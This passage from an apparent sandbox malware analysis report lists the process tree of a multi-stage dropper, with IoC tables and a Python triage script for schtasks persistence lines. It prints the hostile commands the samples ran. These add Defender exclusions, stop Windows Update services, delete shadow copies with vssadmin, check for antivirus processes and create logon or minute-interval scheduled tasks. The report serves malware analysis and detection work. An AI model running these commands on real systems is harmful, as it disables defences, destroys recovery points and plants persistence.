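On the excerpt this leaves three findings: the sample (PID 1720) with SeDebugPrivilege, and frap.exe (PID 3092) with SeBackupPrivilege and SeSecurityPrivilege; the browser's shutdown/pagefile pairs and the two tasklist.exe entries drop out. The allowlist is deliberately keyed on process name only, which is the weakest part of the check: a dropped binary named tasklist.exe would pass it, so treat it as a triage filter, not a verdict.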
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 2212 chrome.exe 2212 chrome.exe 2212 chrome.exe 2212 chrome.exe 2212 chrome.exe 2212 chrome.exe 2212 chrome.exe 2212 chrome.exe 2212 chrome.exe 2212 chrome.exe 2212 chrome.exe 2212 chrome.exe 2212 chrome.exe 2212 chrome.exe 2212 chrome.exe 2212 chrome.exe 2212 chrome.exe 2212 chrome.exe 2212 chrome.exe 2212 chrome.exe 2212 chrome.exe 2212 chrome.exe 2212 chrome.exe 2212 chrome.exe 2212 chrome.exe 2212 chrome.exe 3000 Predicted.pif 3000 Predicted.pif 3000 Predicted.pif 4304 Organizational.pif 4304 Organizational.pif 4304 Organizational.pif 5772 Jurisdiction.pif 5772 Jurisdiction.pif 5772 Jurisdiction.pif 1984 dwm.exe 1984 dwm.exe 1984 dwm.exe 1984 dwm.exe 1984 dwm.exe 1984 dwm.exe 1984 dwm.exe 1984 dwm.exe 1984 dwm.exe 1984 dwm.exe 1984 dwm.exe 3184 inst77player.exe 1984 dwm.exe 1984 dwm.exe 1984 dwm.exe 1984 dwm.exe 1984 dwm.exe 1984 dwm.exe 1984 dwm.exe 1984 dwm.exe 1984 dwm.exe 1984 dwm.exe 1984 dwm.exe 1984 dwm.exe 1984 dwm.exe 1984 dwm.exe 1984 dwm.exe 1984 dwm.exe 1984 dwm.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid   Process              (64 entries; distinct pid/process pairs in order of first appearance)
2212  chrome.exe           (repeated)
3000  Predicted.pif        (x3)
4304  Organizational.pif   (x3)
5772  Jurisdiction.pif     (x3)
1984  dwm.exe              (repeated)
Suspicious use of SetWindowsHookEx 28 IoCs
pid    Process                 (28 entries; in order of first appearance)
4188   chrome.exe              (x1)
5476   chrome.exe              (x16)
3184   inst77player.exe        (x2)
4052   XClient_protected.exe   (x1)
3200   khtoawdltrha.exe        (x1)
9336   Client.exe              (x1)
11476  explorer.exe            (x2)
11424  RegAsm.exe              (x1)
6664   Client1.exe             (x1)
5920   Update.exe              (x2)
Suspicious use of WriteProcessMemory 64 IoCs
pid   Process     wrote to memory of (PID)  procid_target   (64 entries)
2212  chrome.exe  1864                      90              (x2)
2212  chrome.exe  3864                      91              (repeated)
2212  chrome.exe  1692                      92              (x2)
2212  chrome.exe  3944                      93              (repeated)

All 64 entries are chrome.exe (PID 2212) writing into child processes it has just spawned, which is normal Chromium multi-process start-up; none of them involve the sample or its children.
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times; schtasks.exe, which several of the dropped components below invoke, drives the same API.
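The schtasks command lines in this report's process tree are the usual way a dropper reaches that API. The following is an added example, not part of the sandbox report or its tooling: a small parser that turns a `schtasks /create` command line into its options and lists the persistence indicators a responder checks for (logon/boot triggers, high-frequency re-execution, HIGHEST run level, actions in user-writable paths, script actions, silent overwrite with /f). The sample command lines are constructed copies of the three `/create` invocations and one `/delete` invocation seen in the tree; the option table, path heuristics and thresholds are the example's own assumptions.

```python
import re

# Options of schtasks.exe that take a value; anything else beginning with "/" is a flag.
# Assumption for this example: only the options commonly seen in dropper usage are listed.
_VALUE_OPTS = {"tn", "tr", "sc", "mo", "rl", "st", "sd", "ed", "ru", "rp", "du", "ri", "xml", "s", "u", "p"}
# Path fragments that mark user-writable locations (the example's own heuristic list).
_USER_WRITABLE = ("\\appdata\\", "\\programdata\\", "\\temp\\", "\\users\\public\\")
_SCRIPT_EXT = (".bat", ".cmd", ".vbs", ".js", ".ps1", ".hta")


def tokenize(cmdline):
    """Split a Windows command line on whitespace, keeping double-quoted spans intact."""
    return [tok.strip('"') for tok in re.findall(r'"[^"]*"|\S+', cmdline)]


def parse_schtasks(cmdline):
    """Return the options of a schtasks command line as a dict, or None if it is not schtasks."""
    toks = tokenize(cmdline)
    if not toks:
        return None
    exe = toks[0].replace("\\", "/").rsplit("/", 1)[-1].lower()
    if exe not in ("schtasks", "schtasks.exe"):
        return None
    opts = {}
    i = 1
    while i < len(toks):
        tok = toks[i]
        if tok.startswith("/"):
            name = tok[1:].lower()
            if name in _VALUE_OPTS and i + 1 < len(toks):
                opts[name] = toks[i + 1]
                i += 2
                continue
            opts[name] = True
        i += 1
    return opts


def triage_schtasks(cmdline):
    """Flag persistence indicators in a `schtasks /create` command line.

    Returns None for non-schtasks lines and for schtasks lines that do not create a task.
    """
    opts = parse_schtasks(cmdline)
    if opts is None or "create" not in opts:
        return None
    trigger = str(opts.get("sc", "")).upper()
    action = str(opts.get("tr", ""))
    modifier = str(opts.get("mo", "1"))
    reasons = []
    if trigger in ("ONLOGON", "ONSTART"):
        reasons.append("runs at logon/boot")
    if trigger == "MINUTE" and modifier.isdigit() and int(modifier) <= 5:
        reasons.append("re-executes every %s minute(s)" % modifier)
    if str(opts.get("rl", "")).upper() == "HIGHEST":
        reasons.append("requests highest run level")
    low = action.lower()
    if any(marker in low for marker in _USER_WRITABLE):
        reasons.append("action lives in a user-writable directory")
    if low.endswith(_SCRIPT_EXT):
        reasons.append("action is a script")
    if "f" in opts:
        reasons.append("/f silently overwrites an existing task")
    return {"task": str(opts.get("tn", "")), "trigger": trigger, "action": action, "reasons": reasons}


# Constructed sample input: copies of the schtasks invocations in this report's process tree.
SAMPLE_CMDLINES = [
    r'SchTasks /Create /SC ONLOGON /TN "my dr" /TR "e:\net\dr\dr.bat" /f',
    r'"schtasks" /create /tn "MS Build Tools" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Microsoft-Build-Tools\Client.exe" /rl HIGHEST /f',
    r'"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "explorer" /tr "C:\ProgramData\explorer.exe"',
    r'schtasks /delete /f /tn "Windows Upgrade Manager"',
]


def triage_all(cmdlines=SAMPLE_CMDLINES):
    """Triage every line; only task-creating lines produce a result."""
    return [r for r in (triage_schtasks(c) for c in cmdlines) if r is not None]


if __name__ == "__main__":
    for result in triage_all():
        print("%-16s %-8s %s" % (result["task"], result["trigger"], result["action"]))
        for reason in result["reasons"]:
            print("    - " + reason)
```

The parser deliberately ignores which executable name was used (`SchTasks`, `"schtasks"`, or the full System32 path), since the tree shows all three spellings; the triage only runs for lines that actually carry `/create`, so the `/delete` clean-up calls made by the Phorphiex-style components produce no finding.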
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots. In this run the CoronaVirus.exe component also calls vssadmin delete shadows /all /quiet (see the process tree), which removes the restore points a victim could otherwise use to recover files.
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 7504 attrib.exe
Processes

Each node is shown as [depth] image path (PID). The command line follows on the next line where it differs from the image path, then the behaviour tags the sandbox attached to that process.

[1] C:\Windows\Explorer.EXE  (PID 3540)
  [2] C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe  (PID 1720)
      - Checks computer location settings
      - System Location Discovery: System Language Discovery
      - Suspicious use of AdjustPrivilegeToken
    [3] C:\Users\Admin\AppData\Local\Temp\Files\seo.exe  (PID 2840)
        - Checks computer location settings
        - Executes dropped EXE
      [4] C:\Windows\SysWOW64\cmd.exe  (PID 2156)
          cmd: "C:\Windows\System32\cmd.exe" /k move Vote Vote.cmd & Vote.cmd & exit
        [5] C:\Windows\SysWOW64\tasklist.exe  (PID 760)
            cmd: tasklist
            - Enumerates processes with tasklist
            - Suspicious use of AdjustPrivilegeToken
        [5] C:\Windows\SysWOW64\findstr.exe  (PID 4940)
            cmd: findstr /I "wrsa.exe opssvc.exe"
        [5] C:\Windows\SysWOW64\tasklist.exe  (PID 1132)
            cmd: tasklist
            - Enumerates processes with tasklist
            - System Location Discovery: System Language Discovery
            - Suspicious use of AdjustPrivilegeToken
        [5] C:\Windows\SysWOW64\findstr.exe  (PID 2968)
            cmd: findstr /I "avastui.exe avgui.exe bdservicehost.exe ekrn.exe nswscsvc.exe sophoshealth.exe"
        [5] C:\Windows\SysWOW64\cmd.exe  (PID 3140)
            cmd: cmd /c md 419591
            - System Location Discovery: System Language Discovery
        [5] C:\Windows\SysWOW64\findstr.exe  (PID 3956)
            cmd: findstr /V "SAVEDBEDFLESHPROVIDED" Waves
        [5] C:\Windows\SysWOW64\cmd.exe  (PID 4648)
            cmd: cmd /c copy /b ..\Poll + ..\Memorabilia + ..\Kenny + ..\Rick + ..\Britannica + ..\Circuits J
        [5] C:\Users\Admin\AppData\Local\Temp\419591\Predicted.pif  (PID 3000)
            cmd: Predicted.pif J
            - Checks computer location settings
            - Executes dropped EXE
            - System Location Discovery: System Language Discovery
            - Checks processor information in registry
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of FindShellTrayWindow
            - Suspicious use of SendNotifyMessage
          [6] C:\Windows\SysWOW64\cmd.exe  (PID 2592)
              cmd: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\419591\Predicted.pif" & rd /s /q "C:\ProgramData\FCGCGDHJEGHJ" & exit
            [7] C:\Windows\SysWOW64\timeout.exe  (PID 1524)
                cmd: timeout /t 10
                - System Location Discovery: System Language Discovery
                - Delays execution with timeout.exe
        [5] C:\Windows\SysWOW64\choice.exe  (PID 2716)
            cmd: choice /d y /t 5
    [3] C:\Users\Admin\AppData\Local\Temp\Files\ldqj18tn.exe  (PID 1796)
        - Checks computer location settings
        - Executes dropped EXE
        - Drops file in Windows directory
      [4] C:\Windows\SysWOW64\cmd.exe  (PID 64)
          cmd: "C:\Windows\System32\cmd.exe" /c copy Descending Descending.bat & Descending.bat
        [5] C:\Windows\SysWOW64\tasklist.exe  (PID 5952)
            cmd: tasklist
            - Enumerates processes with tasklist
            - System Location Discovery: System Language Discovery
        [5] C:\Windows\SysWOW64\findstr.exe  (PID 5960)
            cmd: findstr /I "wrsa opssvc"
            - System Location Discovery: System Language Discovery
        [5] C:\Windows\SysWOW64\tasklist.exe  (PID 6000)
            cmd: tasklist
            - Enumerates processes with tasklist
            - System Location Discovery: System Language Discovery
        [5] C:\Windows\SysWOW64\findstr.exe  (PID 6008)
            cmd: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
        [5] C:\Windows\SysWOW64\cmd.exe  (PID 6052)
            cmd: cmd /c md 704579
        [5] C:\Windows\SysWOW64\findstr.exe  (PID 6068)
            cmd: findstr /V "MARTNMSPIDERRINGTONE" Mh
        [5] C:\Windows\SysWOW64\cmd.exe  (PID 6140)
            cmd: cmd /c copy /b ..\Consequence + ..\Gently + ..\Situations + ..\International + ..\Jet + ..\Commodities + ..\Mood + ..\Fastest + ..\Estimate + ..\Jessica + ..\Prof + ..\Becoming + ..\Princess + ..\Required + ..\Traveller + ..\Against u
            - System Location Discovery: System Language Discovery
        [5] C:\Users\Admin\AppData\Local\Temp\704579\Organizational.pif  (PID 4304)
            cmd: Organizational.pif u
            - Suspicious use of NtCreateUserProcessOtherParentProcess
            - Checks computer location settings
            - Executes dropped EXE
            - Loads dropped DLL
            - System Location Discovery: System Language Discovery
            - Checks processor information in registry
            - Modifies system certificate store
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of FindShellTrayWindow
            - Suspicious use of SendNotifyMessage
          [6] C:\Windows\SysWOW64\cmd.exe  (PID 5348)
              cmd: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\704579\Organizational.pif" & rd /s /q "C:\ProgramData\EGHCBKKKFHCG" & exit
              - System Location Discovery: System Language Discovery
            [7] C:\Windows\SysWOW64\timeout.exe  (PID 3364)
                cmd: timeout /t 10
                - System Location Discovery: System Language Discovery
                - Delays execution with timeout.exe
        [5] C:\Windows\SysWOW64\choice.exe  (PID 1292)
            cmd: choice /d y /t 5
            - System Location Discovery: System Language Discovery
    [3] C:\Users\Admin\AppData\Local\Temp\Files\s.exe  (PID 3456)
        - Executes dropped EXE
        - Adds Run key to start application
        - Drops file in Windows directory
        - System Location Discovery: System Language Discovery
      [4] C:\Windows\sysvplervcs.exe  (PID 5012)
          - Modifies security service
          - Windows security bypass
          - Checks computer location settings
          - Executes dropped EXE
          - Windows security modification
        [5] C:\Windows\SysWOW64\cmd.exe  (PID 2108)
            cmd: "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
          [6] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  (PID 5192)
              cmd: powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
              - Command and Scripting Interpreter: PowerShell
              - Suspicious behavior: EnumeratesProcesses
        [5] C:\Windows\SysWOW64\cmd.exe  (PID 3832)
            cmd: "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait
          [6] C:\Windows\SysWOW64\sc.exe  (PID 5240)
              cmd: sc stop UsoSvc
              - Launches sc.exe
          [6] C:\Windows\SysWOW64\sc.exe  (PID 5260)
              cmd: sc stop WaaSMedicSvc
              - Launches sc.exe
              - System Location Discovery: System Language Discovery
          [6] C:\Windows\SysWOW64\sc.exe  (PID 5280)
              cmd: sc stop wuauserv
              - Launches sc.exe
              - System Location Discovery: System Language Discovery
          [6] C:\Windows\SysWOW64\sc.exe  (PID 5332)
              cmd: sc stop DoSvc
              - Launches sc.exe
              - System Location Discovery: System Language Discovery
          [6] C:\Windows\SysWOW64\sc.exe  (PID 5404)
              cmd: sc stop BITS /wait
              - Launches sc.exe
              - System Location Discovery: System Language Discovery
        [5] C:\Users\Admin\AppData\Local\Temp\312026255.exe  (PID 5288)
            - Checks computer location settings
            - Executes dropped EXE
            - Suspicious behavior: EnumeratesProcesses
          [6] C:\Windows\System32\cmd.exe  (PID 1112)
              cmd: "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
            [7] C:\Windows\system32\reg.exe  (PID 5200)
                cmd: reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
          [6] C:\Windows\System32\cmd.exe  (PID 5408)
              cmd: "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
            [7] C:\Windows\system32\schtasks.exe  (PID 5276)
                cmd: schtasks /delete /f /tn "Windows Upgrade Manager"
        [5] C:\Users\Admin\AppData\Local\Temp\391817420.exe  (PID 5676)
            - Executes dropped EXE
        [5] C:\Users\Admin\AppData\Local\Temp\132069246.exe  (PID 6100)
            - Executes dropped EXE
            - System Location Discovery: System Language Discovery
          [6] C:\Users\Admin\AppData\Local\Temp\3036535491.exe  (PID 1140)
              - Suspicious use of NtCreateUserProcessOtherParentProcess
              - Executes dropped EXE
              - Suspicious behavior: EnumeratesProcesses
        [5] C:\Windows\SysWOW64\WerFault.exe  (PID 4428)
            cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 5012 -s 1524
            - Program crash
    [3] C:\Users\Admin\AppData\Local\Temp\Files\frap.exe  (PID 3092)
        - Executes dropped EXE
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Users\Admin\AppData\Local\Temp\Files\Meeting-https.exe  (PID 5804)
        - Executes dropped EXE
    [3] C:\Users\Admin\AppData\Local\Temp\Files\inst77player_1.0.0.1.exe  (PID 5992)
        - Executes dropped EXE
        - Loads dropped DLL
      [4] C:\Program Files (x86)\òÐòÐÎåÏßÆײ¥·ÅÆ÷\inst77player.exe  (PID 3184)
          - Executes dropped EXE
          - System Location Discovery: System Language Discovery
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of FindShellTrayWindow
          - Suspicious use of SetWindowsHookEx
    [3] C:\Users\Admin\AppData\Local\Temp\Files\tdrpload.exe  (PID 5180)
        - Executes dropped EXE
        - Adds Run key to start application
        - Drops file in Windows directory
        - System Location Discovery: System Language Discovery
      [4] C:\Windows\sysppvrdnvs.exe  (PID 672)
          - Modifies security service
          - Windows security bypass
          - Checks computer location settings
          - Executes dropped EXE
          - Windows security modification
          - Suspicious behavior: SetClipboardViewer
        [5] C:\Windows\SysWOW64\cmd.exe  (PID 5160)
            cmd: "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
            - System Location Discovery: System Language Discovery
          [6] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  (PID 6080)
              cmd: powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
              - Command and Scripting Interpreter: PowerShell
              - Suspicious behavior: EnumeratesProcesses
        [5] C:\Windows\SysWOW64\cmd.exe  (PID 5944)
            cmd: "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait
          [6] C:\Windows\SysWOW64\sc.exe  (PID 6028)
              cmd: sc stop UsoSvc
              - Launches sc.exe
              - System Location Discovery: System Language Discovery
          [6] C:\Windows\SysWOW64\sc.exe  (PID 6052)
              cmd: sc stop WaaSMedicSvc
              - Launches sc.exe
              - System Location Discovery: System Language Discovery
          [6] C:\Windows\SysWOW64\sc.exe  (PID 6120)
              cmd: sc stop wuauserv
              - Launches sc.exe
          [6] C:\Windows\SysWOW64\sc.exe  (PID 632)
              cmd: sc stop DoSvc
              - Launches sc.exe
          [6] C:\Windows\SysWOW64\sc.exe  (PID 2160)
              cmd: sc stop BITS /wait
              - Launches sc.exe
              - System Location Discovery: System Language Discovery
        [5] C:\Users\Admin\AppData\Local\Temp\41986531.exe  (PID 5136)
            - Checks computer location settings
            - Executes dropped EXE
            - Suspicious behavior: EnumeratesProcesses
          [6] C:\Windows\System32\cmd.exe  (PID 5236)
              cmd: "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
            [7] C:\Windows\system32\reg.exe  (PID 5252)
                cmd: reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
          [6] C:\Windows\System32\cmd.exe  (PID 5848)
              cmd: "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
            [7] C:\Windows\system32\schtasks.exe  (PID 632)
                cmd: schtasks /delete /f /tn "Windows Upgrade Manager"
        [5] C:\Users\Admin\AppData\Local\Temp\1342430716.exe  (PID 5624)
            - Executes dropped EXE
        [5] C:\Users\Admin\AppData\Local\Temp\3084722593.exe  (PID 5940)
            - Executes dropped EXE
            - System Location Discovery: System Language Discovery
    [3] C:\Users\Admin\AppData\Local\Temp\Files\o.exe  (PID 2920)
        - Executes dropped EXE
        - Adds Run key to start application
        - Drops file in Windows directory
        - System Location Discovery: System Language Discovery
      [4] C:\Windows\sysklnorbcv.exe  (PID 5652)
          - Modifies security service
          - Windows security bypass
          - Checks computer location settings
          - Executes dropped EXE
          - Windows security modification
          - System Location Discovery: System Language Discovery
          - Suspicious behavior: SetClipboardViewer
        [5] C:\Windows\SysWOW64\cmd.exe  (PID 5644)
            cmd: "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
            - System Location Discovery: System Language Discovery
          [6] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  (PID 1236)
              cmd: powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
              - Command and Scripting Interpreter: PowerShell
              - System Location Discovery: System Language Discovery
              - Suspicious behavior: EnumeratesProcesses
        [5] C:\Windows\SysWOW64\cmd.exe  (PID 4768)
            cmd: "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS
          [6] C:\Windows\SysWOW64\sc.exe  (PID 2960)
              cmd: sc stop UsoSvc
              - Launches sc.exe
          [6] C:\Windows\SysWOW64\sc.exe  (PID 5640)
              cmd: sc stop WaaSMedicSvc
              - Launches sc.exe
              - System Location Discovery: System Language Discovery
          [6] C:\Windows\SysWOW64\sc.exe  (PID 5224)
              cmd: sc stop wuauserv
              - Launches sc.exe
              - System Location Discovery: System Language Discovery
          [6] C:\Windows\SysWOW64\sc.exe  (PID 632)
              cmd: sc stop DoSvc
              - Launches sc.exe
              - System Location Discovery: System Language Discovery
          [6] C:\Windows\SysWOW64\sc.exe  (PID 3604)
              cmd: sc stop BITS
              - Launches sc.exe
        [5] C:\Users\Admin\AppData\Local\Temp\1066112755.exe  (PID 3824)
            - Checks computer location settings
            - Executes dropped EXE
          [6] C:\Windows\System32\cmd.exe  (PID 5224)
              cmd: "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
            [7] C:\Windows\system32\reg.exe  (PID 5388)
                cmd: reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
          [6] C:\Windows\System32\cmd.exe  (PID 6088)
              cmd: "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
            [7] C:\Windows\system32\schtasks.exe  (PID 5356)
                cmd: schtasks /delete /f /tn "Windows Upgrade Manager"
        [5] C:\Users\Admin\AppData\Local\Temp\334793917.exe  (PID 1316)
            - Executes dropped EXE
        [5] C:\Users\Admin\AppData\Local\Temp\2074828513.exe  (PID 5208)
            - Executes dropped EXE
    [3] C:\Users\Admin\AppData\Local\Temp\Files\first.exe  (PID 4772)
        - Checks computer location settings
        - Drops startup file
        - Executes dropped EXE
        - Adds Run key to start application
        - Suspicious behavior: AddClipboardFormatListener
      [4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 5732)
          cmd: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'first.exe'
          - Command and Scripting Interpreter: PowerShell
          - Suspicious behavior: EnumeratesProcesses
      [4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 4748)
          cmd: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\first.exe'
          - Command and Scripting Interpreter: PowerShell
          - Suspicious behavior: EnumeratesProcesses
        [5] C:\Windows\System32\Conhost.exe  (PID 2960)
            cmd: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    [3] C:\Users\Admin\AppData\Local\Temp\Files\tpeinf.exe  (PID 5628)
        - Executes dropped EXE
        - System Location Discovery: System Language Discovery
    [3] C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe  (PID 3400)
        - Executes dropped EXE
    [3] C:\Users\Admin\AppData\Local\Temp\Files\splwow64.exe  (PID 5200)
        - Checks computer location settings
        - Executes dropped EXE
        - Drops file in Windows directory
        - System Location Discovery: System Language Discovery
      [4] C:\Windows\SysWOW64\cmd.exe  (PID 5620)
          cmd: "C:\Windows\System32\cmd.exe" /c copy Beijing Beijing.bat & Beijing.bat
          - System Location Discovery: System Language Discovery
        [5] C:\Windows\SysWOW64\tasklist.exe  (PID 5576)
            cmd: tasklist
            - Enumerates processes with tasklist
        [5] C:\Windows\SysWOW64\findstr.exe  (PID 4476)
            cmd: findstr /I "wrsa opssvc"
        [5] C:\Windows\SysWOW64\tasklist.exe  (PID 2600)
            cmd: tasklist
            - Enumerates processes with tasklist
        [5] C:\Windows\SysWOW64\findstr.exe  (PID 4032)
            cmd: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
        [5] C:\Windows\SysWOW64\cmd.exe  (PID 408)
            cmd: cmd /c md 197036
        [5] C:\Windows\SysWOW64\findstr.exe  (PID 6060)
            cmd: findstr /V "CRAWFORDFILLEDVERIFYSCALE" Mtv
        [5] C:\Windows\SysWOW64\cmd.exe  (PID 5936)
            cmd: cmd /c copy /b ..\Twisted + ..\Molecular + ..\Sponsorship + ..\Various + ..\Witch + ..\Spirit + ..\See + ..\Fitting T
        [5] C:\Users\Admin\AppData\Local\Temp\197036\Jurisdiction.pif  (PID 5772)
            cmd: Jurisdiction.pif T
            - Suspicious use of NtCreateUserProcessOtherParentProcess
            - Executes dropped EXE
            - Suspicious use of FindShellTrayWindow
            - Suspicious use of SendNotifyMessage
        [5] C:\Windows\SysWOW64\choice.exe  (PID 2840)
            cmd: choice /d y /t 5
            - System Location Discovery: System Language Discovery
    [3] C:\Users\Admin\AppData\Local\Temp\Files\XClient_protected.exe  (PID 4052)
        - Executes dropped EXE
        - Suspicious use of SetWindowsHookEx
    [3] C:\Users\Admin\AppData\Local\Temp\Files\khtoawdltrha.exe  (PID 3200)
        - Executes dropped EXE
        - Suspicious use of NtSetInformationThreadHideFromDebugger
        - Suspicious use of SetWindowsHookEx
    [3] C:\Users\Admin\AppData\Local\Temp\Files\pp.exe  (PID 1512)
        - Executes dropped EXE
    [3] C:\Users\Admin\AppData\Local\Temp\Files\CoronaVirus.exe  (PID 4532)
        - Drops startup file
        - Executes dropped EXE
        - Adds Run key to start application
        - Drops desktop.ini file(s)
        - Drops file in Program Files directory
        - System Location Discovery: System Language Discovery
      [4] C:\Windows\system32\cmd.exe  (PID 1152)
        [5] C:\Windows\system32\mode.com  (PID 7712)
            cmd: mode con cp select=1251
        [5] C:\Windows\system32\vssadmin.exe  (PID 7832)
            cmd: vssadmin delete shadows /all /quiet
            - Interacts with shadow copies
      [4] C:\Windows\SysWOW64\WerFault.exe  (PID 4956)
          cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 4532 -s 1584
          - Program crash
    [3] C:\Users\Admin\AppData\Local\Temp\Files\Installeraus.exe  (PID 1420)
        - Executes dropped EXE
      [4] C:\Users\Admin\AppData\Roaming\MSIX\meshagent32-group.exe  (PID 4508)
          cmd: "C:\Users\Admin\AppData\Roaming\MSIX\meshagent32-group.exe" -fullinstall
          - Sets service image path in registry
          - Executes dropped EXE
          - System Location Discovery: System Language Discovery
    [3] C:\Users\Admin\AppData\Local\Temp\Files\SingerJudy.exe  (PID 4664)
        - Checks computer location settings
        - Executes dropped EXE
        - Drops file in Windows directory
        - System Location Discovery: System Language Discovery
      [4] C:\Windows\SysWOW64\cmd.exe  (PID 1448)
          cmd: "C:\Windows\System32\cmd.exe" /c move Attacked Attacked.bat & Attacked.bat
        [5] C:\Windows\SysWOW64\tasklist.exe  (PID 5716)
            cmd: tasklist
            - Enumerates processes with tasklist
        [5] C:\Windows\SysWOW64\findstr.exe  (PID 5384)
            cmd: findstr /I "wrsa opssvc"
        [5] C:\Windows\SysWOW64\tasklist.exe  (PID 3028)
            cmd: tasklist
            - Enumerates processes with tasklist
        [5] C:\Windows\SysWOW64\findstr.exe  (PID 1776)
            cmd: findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth"
            - System Location Discovery: System Language Discovery
        [5] C:\Windows\SysWOW64\cmd.exe  (PID 1420)
            cmd: cmd /c md 347861
        [5] C:\Windows\SysWOW64\findstr.exe  (PID 1332)
            cmd: findstr /V "systemadaptermeetingskenneth" Grow
        [5] C:\Windows\SysWOW64\cmd.exe  (PID 4620)
            cmd: cmd /c copy /b ..\Officer + ..\Essays + ..\Cool + ..\Prompt + ..\Itunes G
        [5] C:\Users\Admin\AppData\Local\Temp\347861\Councils.pif  (PID 4548)
            cmd: Councils.pif G
            - Suspicious use of NtCreateUserProcessOtherParentProcess
            - Executes dropped EXE
          [6] C:\Users\Admin\AppData\Local\Temp\347861\RegAsm.exe  (PID 11424)
              - Executes dropped EXE
              - Suspicious use of SetWindowsHookEx
        [5] C:\Windows\SysWOW64\choice.exe  (PID 4684)
            cmd: choice /d y /t 5
    [3] C:\Users\Admin\AppData\Local\Temp\Files\Journal.exe  (PID 4552)
        - Executes dropped EXE
    [3] C:\Users\Admin\AppData\Local\Temp\Files\exclude.exe  (PID 3780)
        - Checks computer location settings
        - Executes dropped EXE
      [4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 1544)
          cmd: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Add-MpPreference -ExclusionPath C:\Users"
          - Command and Scripting Interpreter: PowerShell
    [3] C:\Users\Admin\AppData\Local\Temp\Files\tt.exe  (PID 6088)
        - Executes dropped EXE
        - Adds Run key to start application
        - Drops file in Windows directory
      [4] C:\Windows\sysmablsvr.exe  (PID 3196)
          - Modifies security service
          - Windows security bypass
          - Executes dropped EXE
          - Windows security modification
          - System Location Discovery: System Language Discovery
          - Suspicious behavior: SetClipboardViewer
        [5] C:\Users\Admin\AppData\Local\Temp\1234230369.exe  (PID 1668)
            - Checks computer location settings
            - Executes dropped EXE
          [6] C:\Windows\System32\cmd.exe  (PID 5472)
